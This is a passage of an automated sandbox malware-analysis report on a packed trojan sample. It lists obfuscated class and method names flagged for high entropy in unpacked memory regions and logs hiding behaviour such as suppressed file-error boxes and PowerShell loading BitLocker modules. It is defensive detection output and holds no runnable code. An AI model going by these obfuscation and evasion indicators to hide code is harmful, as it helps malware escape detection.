                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, by1Ra86qpBwqoF91TJf.csHigh entropy of concatenated method names: 'fM8Og6hIBe', 'K0DO4QPAdj', 'qK4OY1XuLv', 'TU8IAmilML3Cvq09K7n', 'yp40RxiqxAfHGaUOtIc', 'tDePL6i1SXHrcyWq2iV', 'n4MBB0iy0LIXKETcJtY', 'tP1U7riPdf17g649GIE', 'EjVMI1i4gBAwJHXBAxx'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.csHigh entropy of concatenated method names: 'rt5cycUnBE', 'JHFcP4o5wM', 'Ne5cXoXfWZ', 'kEjctFDdwo', 'zaJcB2iWyq', 'gsPcUUN8A8', 'ji1cdQ9NFZ', 'wfecChWhK8', 'NoZcafa1UA', 'dc5c3YXvUt'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, l1OtpJLerfqx2P3eYZ.csHigh entropy of concatenated method names: 'WPKtKEprC4', 'S2JtZmscPV', 'w8etILxYXd', 'vp7tfn121X', 'zTHt5YvR7i', 'fSLt1GZVwi', 'EHftvUXNNk', 'aEAtTYp8Cc', 'vFWtxkv1eG', 'qPetOjUxGG'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, kiI6p4BSVLG0pd5eAk.csHigh entropy of concatenated method names: 'eyp9IVDoAZ', 'ykF9f06urK', 'uDB9pSCGx7', 'zKY9Jmvp74', 'IlU9EMqQp6', 'TED9RVON8m', 'awt9bC7uhx', 'GYp9DqpxJP', 'mrA90BD7bf', 'Y279W1wj1s'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VNjCJQFsQY5fJYmwZw.csHigh entropy of concatenated method names: 'EZNdgcR4Yp', 'anwd4XmUY6', 'p6xdY66Jx6', 'eVidKnBNa1', 'YSJdrEpVQr', 'BMMdZ2NlS5', 'Oird2KrUDI', 'PtJdIgTrXg', 'C30df0cLEF', 'vH3dwkQBs9'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, DqNgnqV4QAo9HR3WmW.csHigh entropy of concatenated method names: 'omH8xi0YvwWE6Cabsos', 'XHl3FW0CjbI3aL7qCtn', 'di2UTVHkIK', 'gNcUx9Gu15', 'eReUOixc1B', 'bbQhBi0JEtbd8rJqGme', 'TOC9U80mL9caqwEZBdI'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, JnFnlV2AkCEMjZr9N3.csHigh entropy of concatenated method names: 'vfVQdu5o0f', 'vkSQCVR8Qx', 'lD9Q3sAxSW', 'I63Qet1ok0', 'X6WQ5rUb47', 'eg8Q10J4jk', 'mE5wgDUDn9ev75SEr6', 'qxVPOHSreCrvnwybML', 'DowrvmX5q79v2LhCAj', 'eXcQQsRb3Q'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, lTJeWQahmC83W1frBy.csHigh entropy of concatenated method names: 'Dispose', 'q0sQmIPYDS', 'UQMFJVhBd0', 'BCXqqKG64O', 'llfQHfuhRD', 'BxoQzFCndj', 'ProcessDialogKey', 'L8gFVborqe', 'FLAFQOVmvK', 'Vc9FFZfRhK'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, P45isuhkRj9Njwq4ib.csHigh entropy of concatenated method names: 'd5JTpU690G', 'Ry8TJYQ5bV', 'hCFTuClJJb', 'ecdTEH1Amm', 'HG8TGoiVnC', 'jpJTRLl35a', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, xtAWKPr6SqZQ8SYDFI.csHigh entropy of concatenated method names: 'CocUynawPi', 'gR9UXsDvDP', 'bNxUByB4Xv', 'xDvUdMh7WR', 'SBXUCdNlHg', 'fCgBA47bPM', 'LbUBsyqVTN', 'OGGB8PqiE5', 'K9wBNTucQx', 'OvZBmMe48D'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, PwgejifBW1AQaoSbvl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hboFmqVjpW', 'l1IFHNU7Fq', 'c3JFzyo9gX', 'SrjcV1YEPi', 'wdHcQVIscA', 'DxocFFQ066', 'G3Wcc32LQR', 'yFBCxnO5RK3BQYJxd98'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, w5rAZQz7TDAhfnwhZh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jR3x9DZ2TV', 'rlmx5Q6wvR', 'O16x1SJ6eB', 'jmVxv7oSLQ', 'rM2xTitGvA', 'MV4xx64aWI', 'nmaxOfRnLh'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, K7v8N7oaxfulbm8glp.csHigh entropy of concatenated method names: 'VIZXGrk133', 'ORDXi0q85p', 'JvkXkpdvCM', 'HAsX7yF6jE', 'vddXAy2y9I', 'GKcXstKDQx', 'gv4X8sdXVv', 'tenXNCjq3A', 'sYrXmUQXS9', 'IsKXHPHlPK'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, RsmbO4lPM3fqwAXXXZ.csHigh entropy of concatenated method names: 'xiaBrAXowm', 'X6OB2NDdBP', 'BMWtu1MiRS', 'SiRtERKaC5', 'EQgtR0Kokn', 'ysrtSi4iVZ', 'eWLtb59tmt', 'raxtDCeMMu', 'TUwtj81nNA', 'JqNt0rb309'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, h4n1sj5Mhy4vSTRFhG.csHigh entropy of concatenated method names: 'ToString', 'AZv1WrYspN', 'Gjo1J2kPC2', 'GOe1umJLND', 'Yjl1ELKYAX', 'yeA1RA7xGk', 'ukq1S6Mvbr', 'oFg1bi53PR', 'jGw1D9iYFI', 'YLb1jLl1Yf'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, letbS3snUWMQ0MEufm.csHigh entropy of concatenated method names: 'MSyTPTQnjw', 'FexTX2kgke', 'YBMTtI6Awk', 'lMATBqKH1i', 'u5FTU8E52G', 'MHkTdjQya5', 'RyTTCfIpYb', 'amOTawyA13', 'xdiT3cRuy8', 'rHJTeFZaad'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, RdpeJIxDSTHnH9WxuL.csHigh entropy of concatenated method names: 'gWjvNF29IC', 'FTxvHsPUpb', 'EesTVEqYkS', 'IljTQaLYJG', 'SXovWaJfYc', 'YWdvlOlqOr', 'RZHvLf0x67', 'ndZvG1yhUO', 'ccdvixaxZt', 'LR0vkR6AGv'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, iwyL5GvBkUYcPkFRHy.csHigh entropy of concatenated method names: 'NEWdPc3r8h', 'AJ8dtpFU9t', 'zDMdUmp0HV', 'zjYUHmmDI0', 'PgnUzDVR4j', 'TPwdVlMf6S', 'yTrdQ83rrl', 'X46dF76V99', 'qOUdcDVdyG', 'EARdovqrgu'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, sn8T3eqEZoYykx8cPF.csHigh entropy of concatenated method names: 'utUYpwo06', 'xuPKm0IR9', 'fkQZehJOk', 'rYE258lRL', 'TwhfyQhKL', 'st3w1IXsU', 'XvrYba1AOireYOLo7n', 'UBubUAlvZ1lFUAdlFF', 'P95TtkgE7', 'EkRO0Scvd'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, H85CDsAEXTxa2kUmrN.csHigh entropy of concatenated method names: 'PjYxQ9VqwN', 'KfWxcmB3hk', 'boHxoZEQme', 'MaTxPdJCBl', 'sP4xXPxE1E', 'A4xxBarKWO', 'IZxxUG1T1w', 'yoPT8F9L0t', 'VrcTNLJPsh', 'MaITmpqXld'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, WnD0OZ69l1ff1c0ugFq.csHigh entropy of concatenated method names: 'XiCxgPse39', 'nMpx4k1gjN', 'fI3xYBUp2D', 'BdGxKCM0Nv', 'uoQxrxGKNf', 'yDXxZrg0ZH', 'm5sx2qJbQP', 'M3VxIwkDFd', 'uYmxfIPbO9', 'ttZxwdWm0K'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, aivdY56SnFUlwKJRc43.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tPdOGB5oR4', 'd2SOicxY6E', 'TkTOkNruY6', 'yQ6O7pmOhy', 'dLVOAvfsE5', 'ALmOsSEU0b', 'o9DO80MQ4m'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, by1Ra86qpBwqoF91TJf.csHigh entropy of concatenated method names: 'fM8Og6hIBe', 'K0DO4QPAdj', 'qK4OY1XuLv', 'TU8IAmilML3Cvq09K7n', 'yp40RxiqxAfHGaUOtIc', 'tDePL6i1SXHrcyWq2iV', 'n4MBB0iy0LIXKETcJtY', 'tP1U7riPdf17g649GIE', 'EjVMI1i4gBAwJHXBAxx'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.csHigh entropy of concatenated method names: 'rt5cycUnBE', 'JHFcP4o5wM', 'Ne5cXoXfWZ', 'kEjctFDdwo', 'zaJcB2iWyq', 'gsPcUUN8A8', 'ji1cdQ9NFZ', 'wfecChWhK8', 'NoZcafa1UA', 'dc5c3YXvUt'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, l1OtpJLerfqx2P3eYZ.csHigh entropy of concatenated method names: 'WPKtKEprC4', 'S2JtZmscPV', 'w8etILxYXd', 'vp7tfn121X', 'zTHt5YvR7i', 'fSLt1GZVwi', 'EHftvUXNNk', 'aEAtTYp8Cc', 'vFWtxkv1eG', 'qPetOjUxGG'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, kiI6p4BSVLG0pd5eAk.csHigh entropy of concatenated method names: 'eyp9IVDoAZ', 'ykF9f06urK', 'uDB9pSCGx7', 'zKY9Jmvp74', 'IlU9EMqQp6', 'TED9RVON8m', 'awt9bC7uhx', 'GYp9DqpxJP', 'mrA90BD7bf', 'Y279W1wj1s'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VNjCJQFsQY5fJYmwZw.csHigh entropy of concatenated method names: 'EZNdgcR4Yp', 'anwd4XmUY6', 'p6xdY66Jx6', 'eVidKnBNa1', 'YSJdrEpVQr', 'BMMdZ2NlS5', 'Oird2KrUDI', 'PtJdIgTrXg', 'C30df0cLEF', 'vH3dwkQBs9'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, DqNgnqV4QAo9HR3WmW.csHigh entropy of concatenated method names: 'omH8xi0YvwWE6Cabsos', 'XHl3FW0CjbI3aL7qCtn', 'di2UTVHkIK', 'gNcUx9Gu15', 'eReUOixc1B', 'bbQhBi0JEtbd8rJqGme', 'TOC9U80mL9caqwEZBdI'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, JnFnlV2AkCEMjZr9N3.csHigh entropy of concatenated method names: 'vfVQdu5o0f', 'vkSQCVR8Qx', 'lD9Q3sAxSW', 'I63Qet1ok0', 'X6WQ5rUb47', 'eg8Q10J4jk', 'mE5wgDUDn9ev75SEr6', 'qxVPOHSreCrvnwybML', 'DowrvmX5q79v2LhCAj', 'eXcQQsRb3Q'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, lTJeWQahmC83W1frBy.csHigh entropy of concatenated method names: 'Dispose', 'q0sQmIPYDS', 'UQMFJVhBd0', 'BCXqqKG64O', 'llfQHfuhRD', 'BxoQzFCndj', 'ProcessDialogKey', 'L8gFVborqe', 'FLAFQOVmvK', 'Vc9FFZfRhK'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, P45isuhkRj9Njwq4ib.csHigh entropy of concatenated method names: 'd5JTpU690G', 'Ry8TJYQ5bV', 'hCFTuClJJb', 'ecdTEH1Amm', 'HG8TGoiVnC', 'jpJTRLl35a', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, xtAWKPr6SqZQ8SYDFI.csHigh entropy of concatenated method names: 'CocUynawPi', 'gR9UXsDvDP', 'bNxUByB4Xv', 'xDvUdMh7WR', 'SBXUCdNlHg', 'fCgBA47bPM', 'LbUBsyqVTN', 'OGGB8PqiE5', 'K9wBNTucQx', 'OvZBmMe48D'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, PwgejifBW1AQaoSbvl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hboFmqVjpW', 'l1IFHNU7Fq', 'c3JFzyo9gX', 'SrjcV1YEPi', 'wdHcQVIscA', 'DxocFFQ066', 'G3Wcc32LQR', 'yFBCxnO5RK3BQYJxd98'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, w5rAZQz7TDAhfnwhZh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jR3x9DZ2TV', 'rlmx5Q6wvR', 'O16x1SJ6eB', 'jmVxv7oSLQ', 'rM2xTitGvA', 'MV4xx64aWI', 'nmaxOfRnLh'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, K7v8N7oaxfulbm8glp.csHigh entropy of concatenated method names: 'VIZXGrk133', 'ORDXi0q85p', 'JvkXkpdvCM', 'HAsX7yF6jE', 'vddXAy2y9I', 'GKcXstKDQx', 'gv4X8sdXVv', 'tenXNCjq3A', 'sYrXmUQXS9', 'IsKXHPHlPK'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, RsmbO4lPM3fqwAXXXZ.csHigh entropy of concatenated method names: 'xiaBrAXowm', 'X6OB2NDdBP', 'BMWtu1MiRS', 'SiRtERKaC5', 'EQgtR0Kokn', 'ysrtSi4iVZ', 'eWLtb59tmt', 'raxtDCeMMu', 'TUwtj81nNA', 'JqNt0rb309'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, h4n1sj5Mhy4vSTRFhG.csHigh entropy of concatenated method names: 'ToString', 'AZv1WrYspN', 'Gjo1J2kPC2', 'GOe1umJLND', 'Yjl1ELKYAX', 'yeA1RA7xGk', 'ukq1S6Mvbr', 'oFg1bi53PR', 'jGw1D9iYFI', 'YLb1jLl1Yf'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, letbS3snUWMQ0MEufm.csHigh entropy of concatenated method names: 'MSyTPTQnjw', 'FexTX2kgke', 'YBMTtI6Awk', 'lMATBqKH1i', 'u5FTU8E52G', 'MHkTdjQya5', 'RyTTCfIpYb', 'amOTawyA13', 'xdiT3cRuy8', 'rHJTeFZaad'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, RdpeJIxDSTHnH9WxuL.csHigh entropy of concatenated method names: 'gWjvNF29IC', 'FTxvHsPUpb', 'EesTVEqYkS', 'IljTQaLYJG', 'SXovWaJfYc', 'YWdvlOlqOr', 'RZHvLf0x67', 'ndZvG1yhUO', 'ccdvixaxZt', 'LR0vkR6AGv'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, iwyL5GvBkUYcPkFRHy.csHigh entropy of concatenated method names: 'NEWdPc3r8h', 'AJ8dtpFU9t', 'zDMdUmp0HV', 'zjYUHmmDI0', 'PgnUzDVR4j', 'TPwdVlMf6S', 'yTrdQ83rrl', 'X46dF76V99', 'qOUdcDVdyG', 'EARdovqrgu'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, sn8T3eqEZoYykx8cPF.csHigh entropy of concatenated method names: 'utUYpwo06', 'xuPKm0IR9', 'fkQZehJOk', 'rYE258lRL', 'TwhfyQhKL', 'st3w1IXsU', 'XvrYba1AOireYOLo7n', 'UBubUAlvZ1lFUAdlFF', 'P95TtkgE7', 'EkRO0Scvd'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, H85CDsAEXTxa2kUmrN.csHigh entropy of concatenated method names: 'PjYxQ9VqwN', 'KfWxcmB3hk', 'boHxoZEQme', 'MaTxPdJCBl', 'sP4xXPxE1E', 'A4xxBarKWO', 'IZxxUG1T1w', 'yoPT8F9L0t', 'VrcTNLJPsh', 'MaITmpqXld'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, WnD0OZ69l1ff1c0ugFq.csHigh entropy of concatenated method names: 'XiCxgPse39', 'nMpx4k1gjN', 'fI3xYBUp2D', 'BdGxKCM0Nv', 'uoQxrxGKNf', 'yDXxZrg0ZH', 'm5sx2qJbQP', 'M3VxIwkDFd', 'uYmxfIPbO9', 'ttZxwdWm0K'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, aivdY56SnFUlwKJRc43.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tPdOGB5oR4', 'd2SOicxY6E', 'TkTOkNruY6', 'yQ6O7pmOhy', 'dLVOAvfsE5', 'ALmOsSEU0b', 'o9DO80MQ4m'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.2501ae8.1.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.2501ae8.1.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24f56d0.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24f56d0.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24a6fe8.2.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24a6fe8.2.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.4f50000.6.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.4f50000.6.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
